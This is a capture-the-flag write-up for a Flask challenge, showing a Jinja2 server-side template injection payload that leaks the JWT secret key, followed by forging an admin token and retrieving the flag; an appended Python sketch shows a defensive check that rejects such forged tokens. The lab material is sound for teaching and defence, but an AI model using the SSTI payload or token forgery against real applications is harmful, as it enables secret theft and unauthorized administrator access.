Tags: flask ssti web jinja2 jwt 

If we log in as guest, we get a JWT token:
```
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQ2MzE1MzksIm5iZiI6MTU4NDYzMTUzOSwianRpIjoiMTVlYjM3NGQtNjM2MS00YTViLWJkOWMtYWRlMTA1NGRhMWJmIiwiaWRlbnRpdHkiOiJndWVzdCIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.uL2EnxrI-nmAivK526z1WW5pYCbuM1m0DnSt80Ua8t8"
```
We can also read the JWT secret key with a Jinja2 SSTI payload:
```
http://66.172.11.208:5000/{{config.get('JWT_SECRET_KEY')}}
this_is_a_$uper_secure_key
```
Now we can decode and re-encode the token with https://github.com/noraj/flask-session-cookie-manager or https://www.jsonwebtoken.io/ and the secret:
```
{
"iat": 1584631539,
"nbf": 1584631539,
"jti": "15eb374d-6361-4a5b-bd9c-ade1054da1bf",
"identity": "guest",
"fresh": false,
"type": "access",
"exp": 1584636088
}
```
So we change the ```identity``` claim from ```guest``` to ```admin``` and sign the token again:
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQ2MzE1MzksIm5iZiI6MTU4NDYzMTUzOSwianRpIjoiMTVlYjM3NGQtNjM2MS00YTViLWJkOWMtYWRlMTA1NGRhMWJmIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyIsImV4cCI6MTU4NDYzNjI2MH0.oxecwSBNV1ForC6hwNTZTkLQUvDL1odm2z1dcfNdc0E
```
Then we request the flag with this token:
```
SUSEC{server_$ide_R3ND3R!NG_is_a_bad_idea}
```
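The forged token above keeps the guest token's `jti` and only changes `identity`, so a server that records which identity each `jti` was issued for can reject it even though the signature is valid. The sketch below is an added example, not code from the challenge or the original writeup; `check`, `sign`, `ISSUED`, the key and the sample tokens are constructed for illustration.

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mac(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

def sign(claims: dict, key: bytes) -> str:
    """HS256-sign claims; used only to build the constructed samples below."""
    head = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    signing_input = f"{head}.{b64url(json.dumps(claims).encode())}"
    return f"{signing_input}.{b64url(mac(signing_input, key))}"

def check(token: str, key: bytes, issued: dict) -> str:
    """Return 'ok', 'malformed', 'bad-signature', 'unknown-jti' or 'claim-mismatch'."""
    try:
        head, body, sig = token.split(".")
        claims, got = json.loads(b64url_decode(body)), b64url_decode(sig)
    except ValueError:
        return "malformed"
    if not isinstance(claims, dict):
        return "malformed"
    if not hmac.compare_digest(mac(f"{head}.{body}", key), got):
        return "bad-signature"
    jti = claims.get("jti")
    record = issued.get(jti) if isinstance(jti, str) else None
    if record is None:
        return "unknown-jti"      # signed with our key, but never issued by us
    if record != claims.get("identity"):
        return "claim-mismatch"   # issued, but for a different identity
    return "ok"

KEY = b"constructed-demo-key"       # constructed; stands in for JWT_SECRET_KEY
ISSUED = {"jti-guest-1": "guest"}   # hypothetical record written at login
guest = sign({"jti": "jti-guest-1", "identity": "guest", "type": "access"}, KEY)
forged = sign({"jti": "jti-guest-1", "identity": "admin", "type": "access"}, KEY)

if __name__ == "__main__":
    print(check(guest, KEY, ISSUED), check(forged, KEY, ISSUED))
```

This only limits what a leaked key allows; the key still has to be rotated and the request path must stop being rendered as a template.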